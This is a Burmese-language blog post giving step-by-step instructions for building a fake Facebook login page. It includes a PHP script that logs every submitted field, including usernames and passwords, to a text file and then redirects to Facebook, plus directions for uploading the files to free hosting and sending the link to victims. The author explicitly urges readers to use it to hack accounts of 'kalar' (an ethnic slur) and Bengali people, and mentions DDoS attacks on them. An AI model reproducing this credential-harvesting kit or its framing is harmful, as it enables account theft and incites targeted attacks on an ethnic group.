Gmail Phishing

Fake Facebook Login

က်ေနာ္ အစကေတာ့ က်ေနာ့္ သူငယ္ခ်င္းေတြအတြက္ Gmail Phishing ေလး တင္ေပးမလို႕ပါဘဲ။ဒါေပမယ့္ တခ်ိဳ႕ေတြက နည္းပညာကိုအသံုးခ်ျပီး ကိုယ္ေလာက္မသိေသးတဲ့သူေတြရဲ့ အေကာင့္ေတြကို အရယူ ၊ ထိုအေကာင့္ထဲက အခ်က္အလက္ေတြကို ဝင္ဖတ္ ဝင္ၾကည့္ တက္ပါတယ္။Gmail , Gtalk ဆိုတာကလည္း ျမန္မာလူငယ္ေတြအသံုးမ်ားတဲ့အတြက္ နည္းပညာမၾကြယ္၀ေသးတဲ့ ျမန္မာလူငယ္ေတြအတြက္ အႏၱရာယ္ရွိေနပါတယ္။အဲ့ဒါေၾကာင့္ က်ေနာ္ Facebook Phishing ေလး ကိုဘဲ တင္ေပးလိုက္ပါတယ္။အဲ့ဒါဆိုရင္ က်ေနာ္တို႕ ကုလားေတြရဲ့ Facebook account ေတြကို ဒီ Phishing ေလး နဲ႕ Hacking လုပ္ႏိုင္ပါျပီ။
တစ္ခု ... က်ေနာ္ က ပညာရွင္မဟုတ္ပါဘူး။ေလ့လာဆဲ ဘာမွမသိေသးတဲ့ေကာင္ပါ။အခုတင္ေပးတာကလည္း ကုလားေတြကို DDOS ေကၽြးရတာ အားမရဘူး။ကိုယ္တိုင္ Hacking လုပ္ခ်င္တဲ့ သူငယ္ခ်ငး္ေတြအတြက္ပါ။အႏူးညႊန္ေတာင္းပန္ခ်င္တာကေတာ့ ျမန္မာအခ်င္းခ်င္း ျပန္မဟတ္ဖို႕အႏူးညႊန္႕ေမတၱာရပ္ခံပါတယ္ခဗ်ာ။
ကဲ .. စလုပ္ၾကည့္ရေအာင္ ...

( ၁ )
၁ ။ www.facebook.com ကိုသြားပါ။
၂ ။ Right Click ႏွိပ္ျပီး View page source ကိုဝင္ပါ။
၃ ။ View page source ထဲမွာရွိတဲ့စာေတြအကုန္လံုးကို Copy ကူးပါ။ ( Ctrl + A , Ctrl + C )
၄ ။ Run Box ကိုေခၚျပီး Notepad ကိုဖြင့္ပါ။( Window key နဲ႕ R Key ကို တြဲႏွိပ္ျပီး Run Box မွာ Notepad လို႕ရိုက္ဖြင့္ပါ)
၅ ။ View page source မွာ Copy ကူးခဲ့တဲ့စာေတြကို Notepad ထဲမွာ Paste လုပ္လုိက္ပါ။ ( Crtl + V )
၆ ။ Action ကိုရွာပါ။ ( Ctrl + F ကိုႏွိပ္ျပီး Box ေလးထဲမွာ action ကို ရိုက္ထည့္ျပီး ရွာပါ )
၇ ။ Action အေနာက္မွာရွိတဲ့ စာေတြကို ဖ်က္ပါ။ ( History"],["LoginFormController","init",["m049703_2","m049703_3"], [{"__m":"m049703_2"},{"__m":"m049703_3"}]],["TinyViewport"],["WebStorageMonster )
၈ ။ ျပီးရင္ index.html နဲ႕ Save ပါ။Save as type မွာ All file ကို ေရြးေပးရပါမည္။

( ၂ )
၁ ။ Run Box ေခၚျပီး Notepad အသစ္တစ္ခု ထပ္ဖြင့္ပါ။
၂ ။ က်ေနာ္ ေအာက္တြင္ေပးထားေသာ စာမ်ားကို Copy ကူ;ယူျပီး ေစာေစာက သင္ဖြင့္ထားေသာ Notepad ထဲတြင္ Paste လုပ္ပါ။

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

၃ ။ hack.php ျဖင့္ Save လုပ္ပါ။ Save as type မွာ All file ကိုဘဲ ေရႊးေပးပါ။

( ၃ )
၁ ။ ေနာက္ထပ္ Notepad အသစ္တစ္ခုဖြင့္ျပီး ဘာမွမပါဘဲ pswrd ျဖင့္ Save ပါ။ Save as type မွာ txt ပါ။

အဲ့ဒီအဆင့္ သံုး ဆင့္ ျပီးသြားျပီဆိုရင္ သင့္ကြန္ပ်ဴတာ Desktop ေပၚတြင့္ ဖိုင္ ၃ ခု ရရွိလာပါလိမ့္မယ္။
အဲ့လိုရလာျပီဆိုရင္ က်ေနာ္တို႕ ဒီအပိုင္းကို ခဏ ရပ္ထားလိုက္ရေအာင္ ။ ေနာက္ထပ္အပိုင္းတစ္ခုျဖစ္တဲ့ Domain ရယူျခင္း ကို သြားၾကရေအာင္။
၁ ။ www.google.com မွာ free php hosting web sites လို႕ ရိုက္ျပီး သင္ႏွစ္သက္ရာ ဆိုဒ္တစ္ခုမွာ Sign up လုပ္ပါ။
က်ေနာ္ က ေတာ့ www.000webhost.com ကို ေရြးပါတယ္။
၂ ။ Sign up လုပ္ျပီးလွ်င္ သင့္အီးေမးလ္ထဲသို႕ ေမးလ္တစ္ေစာင္ဝင္လာပါလိမ့္မယ္။နည္းနည္းၾကာတယ္။ေစာင့္ပါ။ေမးလ္ေရာက္လာျပီဆိုရင္ သူေပးထားေသာလင့္ကို ေကာ္ပီ ကူး address bar မွာ paste လုပ္ျပီး သြားလိုက္ပါ။အဲ့ဒါဆိုရင္ သင့္အေကာင့္ Confirn ျဖစ္သြားပါျပီ။
အဲ့လို ရရွိလာျပီဆိုရင္ ဒါေလးက ေနာက္ဆံုးအဆင့္ျဖစ္ပါတယ္။ သင္ဖြင့္ထားေသာဆိုဒ္မွာ sign in ဝင္ျပီး Go to Cpanel ထဲကိုဝင္ပါ။
ထိုေနာက္ File manager ထဲကိုဝင္ပါ။ Public_html ဆိုတဲ့ဖိုင္ထဲမွာ php ဆိုတဲ့ဖိုင္ကို ဖ်က္ျပီး ေစာေစာက သင္ျပဳလုပ္ထားေသာ ဖိုင္ သံုးခု ကို Upload တင္ပါ။

အဲ့ဒါဆိုရင္ Phishing ျပဳလုပ္ျခင္း ျပီးဆံုးသြားပါျပီ။သင္ Hack လိုေသာ user အား သင့္ျပဳလုပ္ထားေသာ Fake facebook login page ရဲ့ url ကို ေပးပို႕လိုက္ပါ။သူက Sign in လုပ္လိုက္တယ္ဆိုရင္ေတာ့ သင္ေစာေစာက ဘာစာမွမေရးဘဲ save လုပ္ထားတဲ့ pswrd.txt ဆိုတဲ့ဖိုင္ထဲကို User name နဲ႕ Password ေရာက္ရွိလာပါလိမ့္မယ္။
(သူ Sign in လုပ္ေအာင္ေတာ့ ၾကိဳးစားျပီးေျပာေပါ့။ဘာလို႕လဲဆိုေတာ့ Phishing ရဲ့ အားနည္ခ်က္က Link ျဖစ္ေနလို႕ပါ။Link ကို ဂရုတစိုက္ၾကည့္တက္တဲ့ User ဆိုရင္ေတာ့ ဒီနည္းနဲ႕ သင္ Hacking လုပ္လို႕မရႏိုင္ပါဘူး။)
ကဲ ... သူငယ္ခ်င္းအားလံုး ေပ်ာ္ရႊင္စြာ ကုလားေတြကို Hacking လုပ္ႏိုင္ၾကပါေစဗ်ာ ။ဘဂၤါလီးေတြကိုမဟတ္ဘဲ ျမန္မာအခ်င္းခ်င္း ျပန္ဟတ္ရင္ေတာ့ ကိုညီ တို႕ ကိုေက်ာ္ကိုကို တို႕နဲ႕ တိုင္မွာေနာ္။ ဟီးးးးး :D